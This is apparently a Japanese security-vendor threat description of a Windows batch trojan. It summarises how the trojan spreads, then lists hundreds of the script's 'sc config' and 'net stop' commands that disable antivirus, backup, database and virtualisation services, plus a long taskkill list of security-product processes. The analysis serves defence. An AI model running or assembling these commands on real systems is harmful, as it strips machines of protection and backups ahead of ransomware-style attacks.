Trojan.BAT.STARTER.TIAOOAAZ
プラットフォーム:
Windows
危険度:
ダメージ度:
感染力:
感染確認数:
情報漏えい:
マルウェアタイプ:
トロイの木馬型
破壊活動の有無:
なし
暗号化:
なし
感染報告の有無 :
はい
概要
感染経路 インターネットからのダウンロード
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
マルウェアは、セキュリティ対策製品に関連するサービスを無効にします。これにより、マルウェアは、感染コンピュータから削除されることなく不正活動を実行することが可能になります。
詳細
ファイルサイズ 47,932 bytes
タイプ BAT
メモリ常駐 なし
発見日 2020年5月28日
ペイロード サービスの無効
侵入方法
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
マルウェアは、以下のプロセスを追加します。
- Disable the following anti-virus and anti-malware related services:
- sc config aswBcc start= disabled
- sc config bedbg start= disabled
- sc config ccEvtMgr start= disabled
- sc config ccSetMgr start= disabled
- sc config EhttpSrv start= disabled
- sc config ekrn start= disabled
- sc config EPIntegrationService start= disable
- sc config EPProtectedService start= disable
- sc config epredline start= disable
- sc config EPUpdateServicestart= disabled
- sc config EPUpdateService start= disabled
- sc config EPUpdateService start= disable
- sc config ESHASRV start= disabled
- sc config macmnsvc start= disabled
- sc config masvc start= disabled
- sc config McTaskManager start= disabled
- sc config mfefire start= disabled
- sc config mfevtp start= disabled
- sc config mfewc start= disabled
- sc config ntrtscan start= disabled
- sc config SAVService start= disabled
- sc config SepMasterService start= disabled
- sc config SepMasterServiceMig start= disabled
- sc config Smcinst start= disabled
- sc config SntpService start= disabled
- sc config svcGenericHost start= disabled
- sc config swi_filter start= disabled
- sc config swi_service start= disabled
- sc config swi_update start= disabled
- sc config swi_update_64 start= disabled
- sc config Symantec start= disabled
- sc config "Symantec System Recovery" start= disabled
- sc config TmCCSF start= disabled
- sc config TmPfw start= disable
- sc config TrueKeyScheduler start= disabled
- sc config TrueKeyServiceHelper start= disabled
- sc config WdNisSvc start= disabled
- Disable other services:
- sc config "Acronis VSS Provider" start= disabled
- sc config AcronisAgent start= disabled
- sc config AcrSch2Svc start= disabled
- sc config AdobeARMservice start= disabled
- sc config Alerter start= disabled
- sc config ARSM start= disabled
- sc config avbackup start= disabled
- sc config BackupExecAgentAccelerator start= disabled
- sc config BackupExecAgentBrowser start= disabled
- sc config BackupExecDeviceMediaService start= disabled
- sc config BackupExecJobEngine start= disabled
- sc config BackupExecManagementService start= disabled
- sc config BackupExecRPCService start= disabled
- sc config BackupExecVSSProvider start= disabled
- sc config bcrservice start= disabled
- sc config BITSstart= disabled
- sc config BlueStripeCollector start= disabled
- sc config BrokerInfrastructurestart= disabled
- sc config Cissesrv start= disabled
- sc config CpqRcmc3 start= disabled
- sc config CSAdmin start= disabled
- sc config CSAuth start= disabled
- sc config CSDbSync start= disabled
- sc config CSLog start= disabled
- sc config CSMon start= disabled
- sc config CSRadius start= disabled
- sc config CSTacacs start= disabled
- sc config DB2 start= disabled
- sc config DB2-0 start= disabled
- sc config DB2DAS00 start= disabled
- sc config DB2GOVERNOR_DB2COPY1 start= disabled
- sc config DB2INST2 start= disabled
- sc config DB2LICD_DB2COPY1 start= disabled
- sc config DB2MGMTSVC_DB2COPY1 start= disabled
- sc config DB2REMOTECMD_DB2COPY1 start= disabled
- sc config DCAgent start= disabled
- sc config "Enterprise Client Service" start= disabled
- sc config epag start= disable
- sc config EPSecurityServicestart= disabled
- sc config EPSecurityService start= disabled
- sc config EPSecurityService start= disable
- sc config EraserSvc11710 start= disabled
- sc config ERSvc start= disabled
- sc config EsgShKernel start= disabled
- sc config Eventlog start= disabled
- sc config FA_Scheduler start= disabled
- sc config GoogleChromeElevationService start= disabled
- sc config gupdate start= disabled
- sc config gupdatem start= disabled
- sc config HealthService start= disabled
- sc config IBMDataServerMgr start= disabled
- sc config IBMDSServer41 start= disabled
- sc config IDriverT start= disabled
- sc config IISAdmin start= disabled
- sc config IMAP4Svc start= disabled
- sc config ImapiService start= disabled
- sc config klnagent start= disabled
- sc config LogProcessorService start= disabled
- sc config LRSDRVX start= disabled
- sc config MBAMService start= disabled
- sc config MBEndpointAgent start= disabled
- sc config McShield start= disabled
- sc config mfemms start= disabled
- sc config MMS start= disabled
- sc config mozyprobackup start= disabled
- sc config MsDtsServer start= disabled
- sc config MsDtsServer100 start= disabled
- sc config MsDtsServer110 start= disabled
- sc config MsDtsServer130 start= disabled
- sc config MSExchangeES start= disabled
- sc config MSExchangeIS start= disabled
- sc config MSExchangeMGMT start= disabled
- sc config MSExchangeMTA start= disabled
- sc config MSExchangeSA start= disabled
- sc config MSExchangeSRS start= disabled
- sc config msftesql$PROD start= disabled
- sc config MSMQ start= disabled
- sc config MSOLAP$SQL_2008 start= disabled
- sc config MSOLAP$SYSTEM_BGC start= disabled
- sc config MSOLAP$TPS start= disabled
- sc config MSOLAP$TPSAMA start= disabled
- sc config MSSQL$BKUPEXEC start= disabled
- sc config MSSQL$CITRIX_METAFRAME start= disabled
- sc config MSSQL$ECWDB2 start= disabled
- sc config MSSQL$EPOSERVER start= disabled
- sc config MSSQL$ITRIS start= disabled
- sc config MSSQL$NET2 start= disabled
- sc config MSSQL$PRACTICEMGT start= disabled
- sc config MSSQL$PRACTTICEBGC start= disabled
- sc config MSSQL$PROD start= disabled
- sc config MSSQL$PROFXENGAGEMENT start= disabled
- sc config MSSQL$SBSMONITORING start= disabled
- sc config MSSQL$SHAREPOINT start= disabled
- sc config MSSQL$SQL_2008 start= disabled
- sc config MSSQL$SQLEXPRESS start= disabled
- sc config MSSQL$SYSTEM_BGC start= disabled
- sc config MSSQL$TPS start= disabled
- sc config MSSQL$TPSAMA start= disabled
- sc config MSSQL$VEEAMSQL2008R2 start= disabled
- sc config MSSQL$VEEAMSQL2012 start= disabled
- sc config MSSQLFDLauncher start= disabled
- sc config MSSQLFDLauncher$ITRIS start= disabled
- sc config MSSQLFDLauncher$PROFXENGAGEMENT start= disabled
- sc config MSSQLFDLauncher$SBSMONITORING start= disabled
- sc config MSSQLFDLauncher$SHAREPOINT start= disabled
- sc config MSSQLFDLauncher$SQL_2008 start= disabled
- sc config MSSQLFDLauncher$SYSTEM_BGC start= disabled
- sc config MSSQLFDLauncher$TPS start= disabled
- sc config MSSQLFDLauncher$TPSAMA start= disabled
- sc config MSSQLLaunchpad$ITRIS start= disabled
- sc config MSSQLSERVER start= disabled
- sc config MSSQLServerADHelper start= disabled
- sc config MSSQLServerADHelper100 start= disabled
- sc config MSSQLServerOLAPService start= disabled
- sc config msvsmon90 start= disabled
- sc config MySQL57 start= disabled
- sc config Net2ClientSvc start= disabled
- sc config NetDDE start= disabled
- sc config NetMsmqActivator start= disabled
- sc config NetSvc start= disabled
- sc config NimbusWatcherService start= disabled
- sc config NtLmSsp start= disabled
- sc config NtmsSvc start= disabled
- sc config odserv start= disabled
- sc config OracleClientCache80 start= disabled
- sc config ose start= disabled
- sc config PDVFSService start= disabled
- sc config POP3Svc start= disabled
- sc config ProLiantMonitor start= disabled
- sc config ReportServer start= disabled
- sc config ReportServer$SQL_2008 start= disabled
- sc config ReportServer$SYSTEM_BGC start= disabled
- sc config ReportServer$TPS start= disabled
- sc config ReportServer$TPSAMA start= disabled
- sc config RESvc start= disabled
- sc config RSCDsvc start= disabled
- sc config sacsvr start= disabled
- sc config SamSs start= disabled
- sc config SDD_Service start= disabled
- sc config SDRSVC start= disabled
- sc config SentinelAgent start= disabled
- sc config SentinelHelperService start= disabled
- sc config SentinelStaticEngine start= disabled
- sc config ShMonitor start= disabled
- sc config SmcService start= disabled
- sc config SMTPSvc start= disabled
- sc config SNAC start= disabled
- sc config SnowInventoryClient start= disabled
- sc config "SQL Backups" start= disabled
- sc config SQLAgent$BKUPEXEC start= disabled
- sc config SQLAgent$CITRIX_METAFRAME start= disabled
- sc config SQLAgent$CXDB start= disabled
- sc config SQLAgent$ECWDB2 start= disabled
- sc config SQLAgent$EPOSERVER start= disabled
- sc config SQLAgent$ITRIS start= disabled
- sc config SQLAgent$NET2 start= disabled
- sc config SQLAgent$PRACTTICEBGC start= disabled
- sc config SQLAgent$PRACTTICEMGT start= disabled
- sc config SQLAgent$PROD start= disabled
- sc config SQLAgent$PROFXENGAGEMENT start= disabled
- sc config SQLAgent$SBSMONITORING start= disabled
- sc config SQLAgent$SHAREPOINT start= disabled
- sc config SQLAgent$SQL_2008 start= disabled
- sc config SQLAgent$SQLEXPRESS start= disabled
- sc config SQLAgent$SYSTEM_BGC start= disabled
- sc config SQLAgent$TPS start= disabled
- sc config SQLAgent$TPSAMA start= disabled
- sc config SQLAgent$VEEAMSQL2008R2 start= disabled
- sc config SQLAgent$VEEAMSQL2012 start= disabled
- sc config SQLBrowser start= disabled
- sc config "SQLsafe Backup Service" start= disabled
- sc config "SQLsafe Filter Service" start= disabled
- sc config SQLSafeOLRService start= disabled
- sc config SQLSERVERAGENT start= disabled
- sc config SQLTELEMETRY start= disabled
- sc config SQLTELEMETRY$ECWDB2 start= disabled
- sc config SQLTELEMETRY$ITRIS start= disabled
- sc config SQLWriter start= disabled
- sc config SSISTELEMETRY130 start= disabled
- sc config SstpSvc start= disabled
- sc config sysdown start= disabled
- sc config System start= disabled
- sc config Telemetryserver start= disabled
- sc config TlntSvr start= disabled
- sc config tmlisten start= disabled
- sc config tpautoconnsvc start= disabled
- sc config TPAutoConnSvc start= disabled
- sc config TPVCGateway start= disabled
- sc config TrueKey start= disabled
- sc config TSM start= disabled
- sc config UI0Detect start= disabled
- sc config "Veeam Backup Catalog Data Service" start= disabled
- sc config VeeamBackupSvc start= disabled
- sc config VeeamBrokerSvc start= disabled
- sc config VeeamCatalogSvc start= disabled
- sc config VeeamCloudSvc start= disabled
- sc config VeeamDeploymentService start= disabled
- sc config VeeamDeploySvc start= disabled
- sc config VeeamEnterpriseManagerSvc start= disabled
- sc config VeeamHvIntegrationSvc start= disabled
- sc config VeeamMountSvc start= disabled
- sc config VeeamNFSSvc start= disabled
- sc config VeeamRESTSvc start= disabled
- sc config VeeamTransportSvc start= disabled
- sc config VGAuthService start= disabled
- sc config VMTools start= disabled
- sc config VMware start= disabled
- sc config VMwareCAFCommAmqpListener start= disabled
- sc config VMwareCAFManagementAgentHost start= disabled
- sc config vmware-converter-agent start= disabled
- sc config vmware-converter-server start= disabled
- sc config vmware-converter-worker start= disabled
- sc config W3Svc start= disabled
- sc config wbengine start= disabled
- sc config WebClient start= disabled
- sc config WinDefend start= disabled
- sc config WinVNC4 start= disabled
- sc config WRSVC start= disabled
- sc config "Zoolz 2 Service" start= disabled
- Terminate services:
- net stop "Acronis VSS Provider" /y
- net stop AcrSch2Svc /y
- net stop AdobeARMservice /y
- net stop Alerter /y
- net stop ARSM /y
- net stop avbackup /y
- net stop BackupExecAgentAccelerator /y
- net stop BackupExecAgentBrowser /y
- net stop BackupExecDeviceMediaService /y
- net stop BackupExecJobEngine /y
- net stop BackupExecManagementService /y
- net stop BackupExecVSSProvider /y
- net stop bcrservice /y
- net stop bedbg /y
- net stop BITS /y
- net stop BlueStripeCollector /y
- net stop BrokerInfrastructure /y
- net stop Cissesrv /y
- net stop CpqRcmc3 /y
- net stop CSAdmin /y
- net stop CSAuth /y
- net stop CSDbSync /y
- net stop CSLog /y
- net stop CSMon /y
- net stop CSRadius /y
- net stop CSTacacs /y
- net stop DB2 /y
- net stop DB2-0 /y
- net stop DB2DAS00 /y
- net stop DB2GOVERNOR_DB2COPY1 /y
- net stop DB2INST2 /y
- net stop DB2LICD_DB2COPY1 /y
- net stop DB2MGMTSVC_DB2COPY1 /y
- net stop DB2REMOTECMD_DB2COPY1 /y
- net stop DCAgent /y
- net stop "Enterprise Client Service" /y
- net stop epag /y
- net stop epredline /y
- net stop EraserSvc11710 /y
- net stop ERSvc /y
- net stop EsgShKernel /y
- net stop Eventlog /y
- net stop GoogleChromeElevationService /y
- net stop gupdate /y
- net stop gupdatem /y
- net stop HealthService /y
- net stop IBMDataServerMgr /y
- net stop IBMDSServer41 /y
- net stop IISAdmin /y
- net stop IMAP4Svc /y
- net stop ImapiService /y
- net stop LogProcessorService /y
- net stop LRSDRVX /y
- net stop MBEndpointAgent /y
- net stop McTaskManager /y
- net stop MMS /y
- net stop mozyprobackup /y
- net stop MsDtsServer /y
- net stop MsDtsServer100 /y
- net stop MsDtsServer110 /y
- net stop MsDtsServer130 /y
- net stop MSExchangeES /y
- net stop MSExchangeIS /y
- net stop MSExchangeMGMT /y
- net stop MSExchangeMTA /y
- net stop MSExchangeSA /y
- net stop MSExchangeSRS /y
- net stop msftesql$PROD /y
- net stop MSMQ /y
- net stop MSOLAP$SQL_2008 /y
- net stop MSOLAP$SYSTEM_BGC /y
- net stop MSOLAP$TPS /y
- net stop MSOLAP$TPSAMA /y
- net stop MSSQL$BKUPEXEC /y
- net stop MSSQL$CITRIX_METAFRAME /y
- net stop MSSQL$ECWDB2 /y
- net stop MSSQL$EPOSERVER /y
- net stop MSSQL$ITRIS /y
- net stop MSSQL$NET2 /y
- net stop MSSQL$PRACTICEMGT /y
- net stop MSSQL$PRACTTICEBGC /y
- net stop MSSQL$PROD /y
- net stop MSSQL$PROFXENGAGEMENT /y
- net stop MSSQL$SBSMONITORING /y
- net stop MSSQL$SHAREPOINT /y
- net stop MSSQL$SQL_2008 /y
- net stop MSSQL$SQLEXPRESS /y
- net stop MSSQL$SYSTEM_BGC /y
- net stop MSSQL$TPS /y
- net stop MSSQL$TPSAMA /y
- net stop MSSQL$VEEAMSQL2008R2 /y
- net stop MSSQL$VEEAMSQL2012 /y
- net stop MSSQLFDLauncher /y
- net stop MSSQLFDLauncher$ITRIS /y
- net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
- net stop MSSQLFDLauncher$SBSMONITORING /y
- net stop MSSQLFDLauncher$SHAREPOINT /y
- net stop MSSQLFDLauncher$SQL_2008 /y
- net stop MSSQLFDLauncher$SYSTEM_BGC /y
- net stop MSSQLFDLauncher$TPS /y
- net stop MSSQLFDLauncher$TPSAMA /y
- net stop MSSQLLaunchpad$ITRIS /y
- net stop MSSQLSERVER /y
- net stop MSSQLServerADHelper /y
- net stop MSSQLServerADHelper100 /y
- net stop MSSQLServerOLAPService /y
- net stop msvsmon90 /y
- net stop MySQL57 /y
- net stop Net2ClientSvc /y
- net stop NetDDE /y
- net stop NetMsmqActivator /y
- net stop NetSvc /y
- net stop NimbusWatcherService /y
- net stop NtLmSsp /y
- net stop NtmsSvc /y
- net stop odserv /y
- net stop OracleClientCache80 /y
- net stop ose /y
- net stop PDVFSService /y
- net stop POP3Svc /y
- net stop ProLiantMonitor /y
- net stop ReportServer /y
- net stop ReportServer$SQL_2008 /y
- net stop ReportServer$SYSTEM_BGC /y
- net stop ReportServer$TPS /y
- net stop ReportServer$TPSAMA /y
- net stop RESvc /y
- net stop RSCDsvc /y
- net stop sacsvr /y
- net stop SamSs /y
- net stop SAVService /y
- net stop SDD_Service /y
- net stop SDRSVC /y
- net stop SentinelAgent /y
- net stop SentinelHelperService /y
- net stop SentinelStaticEngine /y
- net stop ShMonitor /y
- net stop SmcService /y
- net stop SMTPSvc /y
- net stop SnowInventoryClient /y
- net stop "SQL Backups" /y
- net stop SQLAgent$BKUPEXEC /y
- net stop SQLAgent$CITRIX_METAFRAME /y
- net stop SQLAgent$CXDB /y
- net stop SQLAgent$ECWDB2 /y
- net stop SQLAgent$EPOSERVER /y
- net stop SQLAgent$ITRIS /y
- net stop SQLAgent$NET2 /y
- net stop SQLAgent$PRACTTICEBGC /y
- net stop SQLAgent$PRACTTICEMGT /y
- net stop SQLAgent$PROD /y
- net stop SQLAgent$PROFXENGAGEMENT /y
- net stop SQLAgent$SBSMONITORING /y
- net stop SQLAgent$SHAREPOINT /y
- net stop SQLAgent$SQL_2008 /y
- net stop SQLAgent$SQLEXPRESS /y
- net stop SQLAgent$SYSTEM_BGC /y
- net stop SQLAgent$TPS /y
- net stop SQLAgent$TPSAMA /y
- net stop SQLAgent$VEEAMSQL2008R2 /y
- net stop SQLAgent$VEEAMSQL2012 /y
- net stop SQLBrowser /y
- net stop "SQLsafe Backup Service" /y
- net stop "SQLsafe Filter Service" /y
- net stop SQLSafeOLRService /y
- net stop SQLSERVERAGENT /y
- net stop SQLTELEMETRY /y
- net stop SQLTELEMETRY$ECWDB2 /y
- net stop SQLTELEMETRY$ITRIS /y
- net stop SQLWriter /y
- net stop SSISTELEMETRY130 /y
- net stop SstpSvc /y
- net stop sysdown /y
- net stop System /y
- net stop Telemetryserver /y
- net stop TlntSvr /y
- net stop tpautoconnsvc /y
- net stop TPAutoConnSvc /y
- net stop TPVCGateway /y
- net stop TrueKey /y
- net stop TrueKeyScheduler /y
- net stop TrueKeyServiceHelper /y
- net stop TSM /y
- net stop UI0Detect /y
- net stop "Veeam Backup Catalog Data Service" /y
- net stop VeeamBackupSvc /y
- net stop VeeamBrokerSvc /y
- net stop VeeamCatalogSvc /y
- net stop VeeamCloudSvc /y
- net stop VeeamDeploymentService /y
- net stop VeeamDeploySvc /y
- net stop VeeamEnterpriseManagerSvc /y
- net stop VeeamHvIntegrationSvc /y
- net stop VeeamMountSvc /y
- net stop VeeamNFSSvc /y
- net stop VeeamRESTSvc /y
- net stop VeeamTransportSvc /y
- net stop VGAuthService /y
- net stop VMTools /y
- net stop VMware /y
- net stop VMwareCAFCommAmqpListener /y
- net stop VMwareCAFManagementAgentHost /y
- net stop vmware-converter-agent /y
- net stop vmware-converter-server /y
- net stop vmware-converter-worker /y
- net stop W3Svc /y
- net stop wbengine /y
- net stop WebClient /y
- net stop WinVNC4 /y
- net stop WRSVC /y
- net stop "Zoolz 2 Service" /y
- taskkill /im {Process Name} /f -Terminate anti-virus and anti-malware related processes, where {Process Name} can be any of the following:
- a2service.exe
- a2start.exe
- aawservice.exe
- acaas.exe
- acaegmgr.exe
- acaif.exe
- acais.exe
- acctmgr.exe
- ad-aware2007.exe
- administrator.exe
- adminserver.exe
- aflogvw.exe
- afwserv.exe
- ahnrpt.exe
- ahnsd.exe
- ahnsdsv.exe
- alert.exe
- alertsvc.exe
- almon.exe
- alogserv.exe
- alsvc.exe
- alunotify.exe
- alupdate.exe
- aluschedulersvc.exe
- amswmagt
- aphost.exe
- appsvc32.exe
- aps.exe
- apvxdwin.exe
- ashbug.exe
- ashchest.exe
- ashcmd.exe
- ashdisp.exe
- ashenhcd.exe
- ashlogv.exe
- ashmaisv.exe
- ashpopwz.exe
- ashquick.exe
- ashserv.exe
- ashsimp2.exe
- ashsimpl.exe
- ashskpcc.exe
- ashskpck.exe
- ashupd.exe
- ashwebsv.exe
- asupport.exe
- aswdisp.exe
- aswregsvr.exe
- aswserv.exe
- aswupdsv.exe
- aswwebsv.exe
- atwsctsk.exe
- aupdrun.exe
- aus.exe
- auth8021x.exe
- autoup.exe
- avcenter.exe
- avconfig.exe
- avconsol.exe
- avengine.exe
- avesvc.exe
- avfwsvc.exe
- avkproxy.exe
- avkservice.exe
- avktray.exe
- avkwctl.exe
- avltmain.exe
- avmailc.exe
- avmcdlg.exe
- avnotify.exe
- avscan.exe
- avserver.exe
- avshadow.exe
- avsynmgr.exe
- avtask.exe
- avwebgrd.exe
- bavtray.exe
- bdagent.exe
- bdc.exe
- bdlite.exe
- bdmcon.exe
- bdredline.exe
- bdss.exe
- bdsubmit.exe
- bhipssvc.exe
- bka.exe
- blackd.exe
- blackice.exe
- blupro.exe
- bmrt.exe
- bwgo0000
- ca.exe
- caantispyware.exe
- caav.exe
- caavcmdscan.exe
- caavguiscan.exe
- caf.exe
- cafw.exe
- caissdt.exe
- calogdump.exe
- capfaem.exe
- capfasem.exe
- capfsem.exe
- capmuamagt.exe
- cappactiveprotection.ex
- casc.exe
- casecuritycenter.exe
- caunst.exe
- cavrep.exe
- cavrid.exe
- cavscan.exe
- cavtray.exe
- ccap.exe
- ccapp.exe
- ccemflsv.exe
- ccenter.exe
- ccevtmgr.exe
- cclaw.exe
- ccnfagent.exe
- ccprovsp.exe
- ccproxy.exe
- ccpxysvc.exe
- ccschedulersvc.exe
- ccsetmgr.exe
- ccsmagtd.exe
- ccsvchst.exe
- ccsystemreport.exe
- cctray.exe
- ccupdate.exe
- certificationmanagerser
- cfftplugin.exe
- cfnotsrvd.exe
- cfp.exe
- cfpconfg.exe
- cfpconfig.exe
- cfplogvw.exe
- cfpsbmit.exe
- cfpupdat.exe
- cfsmsmd.exe
- checkup.exe
- cis.exe
- cistray.exe
- cka.exe
- clamscan.exe
- clamtray.exe
- clamwin.exe
- clps.exe
- clpsla.exe
- clpsls.exe
- clshield.exe
- cmdagent.exe
- cmdinstall.exe
- cmgrdian.exe
- cntaosmgr.exe
- comhost.exe
- console.exe
- coreframeworkhost.exe /
- coreserviceshell.exe
- cpd.exe
- cpdclnt.exe
- cpf.exe
- cpntsrv.exe
- cramtray.exe
- crashrep.exe
- crdm.exe
- crssvc.exe
- csacontrol.exe
- csadmin.exe
- csauth.exe
- csfalconservice.exe
- csinject.exe
- csinsm32.exe
- csinsmnt.exe
- cssauth.exe
- cylancesvc.exe
- cylanceui.exe
- dao_log.exe
- dbserv.exe
- dbsrv9.exe
- defwatch
- defwatch.exe
- deloeminfs.exe
- deteqt.agent.exe
- diskmon.exe
- djsnetcn.exe
- dlservice.exe
- doscan.exe
- dpmra.exe
- dr_serviceengine.exe
- drwagntd.exe
- drwagnui.exe
- drweb.exe
- drweb32.exe
- drweb32w.exe
- drweb386.exe
- drwebcgp.exe
- drwebcom.exe
- drwebdc.exe
- drwebmng.exe
- drwebscd.exe
- drwebupw.exe
- drwebwcl.exe
- drwebwin.exe
- drwinst.exe
- drwupgrade.exe
- dwarkdaemon.exe
- dwengine.exe
- dwhwizrd.exe
- dwnetfilter.exe
- dwwin.exe
- edisk.exe
- eeyeevnt.exe
- egui.exe
- ehttpsrv.exe
- ekrn.exe
- elogsvc.exe
- emlibupdateagentnt.exe
- emlproui.exe
- emlproxy.exe
- endpointsecurity.exe
- engineserver.exe
- entitymain.exe
- era.exe
- esecagntservice.exe
- esecservice.exe
- esmagent.exe
- etagent.exe
- etconsole3.exe
- etcorrel.exe
- etloganalyzer.exe
- etreporter.exe
- etrssfeeds.exe
- etscheduler.exe
- etwcontrolpanel.exe
- euqmonitor.exe
- eventparser.exe
- evtarmgr.exe
- evtmgr.exe
- evtprocessecfile.exe
- ewidoctrl.exe
- fameh32.exe
- fcappdb.exe
- fcdblog.exe
- fch32.exe
- fchelper64.exe
- fcsms.exe
- fcssas.exe
- fih32.exe
- firesvc.exe
- firetray.exe
- firewallgui.exe
- fmon.exe
- forcefield.exe
- fpavserver.exe
- fprottray.exe
- frameworkservic
- frameworkservic.exe
- frameworkservice.exe
- fsaa.exe
- fsaua.exe
- fsav32.exe
- fsavgui.exe
- fscuif.exe
- fsdfwd.exe
- fsgk32.exe
- fsgk32st.exe
- fsguidll.exe
- fsguiexe.exe
- fshdll32.exe
- fshoster32.exe
- fshoster64.exe
- fsm32.exe
- fsma32.exe
- fsmb32.exe
- fsorsp.exe
- fspc.exe
- fspex.exe
- fsqh.exe
- fssm32.exe
- fwcfg.exe
- fwinst.exe
- fws.exe
- gcascleaner.exe
- gcasdtserv.exe
- gcasinstallhelper.exe /
- gcasnotice.exe
- gcasserv.exe
- gcasservalert.exe
- gcasswupdater.exe
- gdfirewalltray.exe
- gdfwsvc.exe
- gdscan.exe
- gfireporterservice.exe
- ghost_2.exe
- ghosttray.exe
- giantantispywaremain.ex
- giantantispywareupdater
- gziface.exe
- gzserv.exe
- hwapi.exe
- icepack.exe
- idsinst.exe
- iface.exe
- igateway.exe
- inicio.exe
- inonmsrv.exe
- inorpc.exe
- inort.exe
- inotask.exe
- inoweb.exe
- isafe.exe
- isafinst.exe
- isntsmtp.exe
- isntsysmonitor
- ispwdsvc.exe
- isscsf.exe
- issdaemon.exe
- issvc.exe
- isuac.exe
- iswmgr.exe
- itmrt_supportdiagnostic
- itmrt_trace.exe
- itmrtsvc.exe
- ixaptsvc.exe
- ixavsvc.exe
- ixfwsvc.exe
- kabackreport.exe
- kaccore.exe
- kanmcmain.exe
- kansgui.exe
- kansvr.exe
- kis.exe
- kislive.exe
- kissvc.exe
- klnacserver.exe
- klnagent.exe
- klserver.exe
- klswd.exe
- klwtblfs.exe
- kmailmon.exe
- knownsvr.exe
- knupdatemain.exe
- kpf4gui.exe
- kpf4ss.exe
- kpfw32.exe
- kpfwsvc.exe
- krbcc32s.exe
- kswebshield.exe
- kvdetech.exe
- kvmonxp.kxp
- kvmonxp_2.kxp
- kvolself.exe
- kvsrvxp.exe
- kvsrvxp_1.exe
- kvxp.kxp
- kwatch.exe
- kwsprod.exe
- kxeserv.exe
- leventmgr.exe
- livesrv.exe
- lmon.exe
- log_qtine.exe
- loggingserver.exe
- luall.exe
- lucallbackproxy.exe
- lucoms.exe
- lucoms~1.exe
- lucomserver.exe
- lwdmserver.exe
- macmnsvc.exe
- macompatsvc.exe
- mantispm.exe
- masalert.exe
- massrv.exe
- masvc.exe
- mbamservice.exe
- mbamtray.exe
- mcagent.exe
- mcapexe.exe
- mcappins.exe
- mcconsol.exe
- mcdash.exe
- mcdetect.exe
- mcepoc.exe
- mcepocfg.exe
- mcinfo.exe
- mcmnhdlr.exe
- mcmscsvc.exe
- mcnasvc.exe
- mcods.exe
- mcpalmcfg.exe
- mcpromgr.exe
- mcproxy.exe
- mcregwiz.exe
- mcsacore.exe
- mcscript_inuse.exe
- mcshell.exe
- mcshield.exe
- mcshld9x.exe
- mcsvhost.exe
- mcsysmon.exe
- mctray.exe
- mctskshd.exe
- mcui32.exe
- mcuimgr.exe
- mcupdate.exe
- mcupdmgr.exe
- mcvsftsn.exe
- mcvsrte.exe
- mcvsshld.exe
- mcwce.exe
- mcwcecfg.exe
- mfeann.exe
- mfecanary.exe
- mfeesp.exe
- mfefire.exe
- mfefw.exe
- mfehcs.exe
- mfemactl.exe
- mfemms.exe
- mfetp.exe
- mfevtps.exe
- mfewc.exe
- mfewch.exe
- mgavrtcl.exe
- mghtml.exe
- mgntsvc.exe
- monsvcnt.exe
- monsysnt.exe
- mpcmdrun.exe
- mpf.exe
- mpfagent.exe
- mpfconsole.exe
- mpfservice.exe
- mpfsrv.exe
- mpftray.exe
- mps.exe
- mpsevh.exe
- mpsvc.exe
- mrf.exe
- msascui.exe
- mscifapp.exe
- mskagent.exe
- mskdetct.exe
- msksrver.exe
- msksrvr.exe
- msmpeng.exe
- msscli.exe
- msseces.exe
- msssrv.exe
- myagttry.exe
- nailgpip.exe
- naprdmgr.exe
- navectrl.exe
- navelog.exe
- navesp.exe
- navshcom.exe
- navw32.exe
- navwnt.exe
- ncdaemon.exe
- ndetect.exe
- neotrace.exe
- netcfg.exe
- networkagent.exe
- ngctw32.exe
- ngserver.exe
- nip.exe
- nipsvc.exe
- nisoptui.exe
- nisserv.exe
- nissrv.exe
- nisum.exe
- njeeves.exe
- nmain.exe
- nortonsecurity.exe
- npfmntor.exe
- npfmsg.exe
- npfmsg2.exe
- npfsvice.exe
- nprotect.exe
- npscheck.exe
- npssvc.exe
- nrmenctb.exe
- nscsrvce.exe
- nsctop.exe
- nsmdemf.exe
- nsmdmon.exe
- nsmdreal.exe
- nsmdsch.exe
- nsmdtr.exe
- ntrtscan.exe
- nvcoas.exe
- nvcsched.exe
- nymse.exe
- oasclnt.exe
- oespamtest.exe
- ofcdog.exe
- ofcpfwsvc.exe
- okclient.exe
- olfsnt40.exe
- onlinent.exe
- onlnsvc.exe
- op_viewer.exe
- opscan.exe
- outpost.exe
- padfsvr.exe
- pagent.exe
- pagentwd.exe
- pasystemtray.exe
- pavbckpt.exe
- pavfires.exe
- pavfnsvr.exe
- pavjobs.exe
- pavkre.exe
- pavmail.exe
- pavreport.exe
- pavsched.exe
- pavsrv50.exe
- pavsrv51.exe
- pavsrv52.exe
- pavupg.exe
- pccclient.exe
- pccguide.exe
- pcclient.exe
- pccnt.exe
- pccntmon.exe
- pccntupd.exe
- pccpfw.exe
- pcctlcom.exe
- pcscan.exe
- pcscnsrv.exe
- pctsauxs.exe
- pctsgui.exe
- pctssvc.exe
- pctstray.exe
- pep.exe
- persfw.exe
- pnmsrv.exe
- pntiomon.exe
- pop3pack.exe
- pop3trap.exe
- poproxy.exe
- ppclean.exe
- ppctlpriv.exe
- ppppwallrun.exe
- pqibrowser.exe
- pqv2isvc.exe
- prevsrv.exe
- privacyiconclient.exe
- proutil.exe
- psanhost.exe
- psctris.exe
- psctrls.exe
- psh_svc.exe
- pshost.exe
- psimreal.exe
- psimsvc.exe
- pskmssvc.exe
- psuamain.exe
- psuaservice.exe
- pxemtftp.exe
- pxeservice.exe
- qclean.exe
- qdcsfs.exe
- qoeloader.exe
- qserver.exe
- rapapp.exe
- ras.exe
- rasupd.exe
- rav.exe
- ravmon.exe
- ravmond.exe
- ravservice.exe
- ravstub.exe
- ravtask.exe
- ravtray.exe
- ravupdate.exe
- ravxp.exe
- rcsvcmon.exe
- redirsvc.exe
- regmech.exe
- remupd.exe
- reportersvc.exe
- reportsvc.exe
- retinaengine.exe
- rfwmain.exe
- rfwproxy.exe
- rfwsrv.exe
- rfwstub.exe
- rnav.exe
- rnreport.exe
- routernt.exe
- rpcserv.exe
- rsnetsvr.exe
- rstray.exe
- rtvscan.exe
- rulaunch.exe
- safeservice.exe
- sahookmain.exe
- saservice.exe
- sav32cli.exe
- savfmsectrl.exe
- savfmselog.exe
- savfmsesjm.exe
- savfmsesp.exe
- savfmsespamstatsmanager.exe
- savfmsesrv.exe
- savfmsetask.exe
- savfmseui.exe
- savmain.exe
- savroam.exe
- savscan.exe
- savservice.exe
- savui.exe
- sbserv.exe
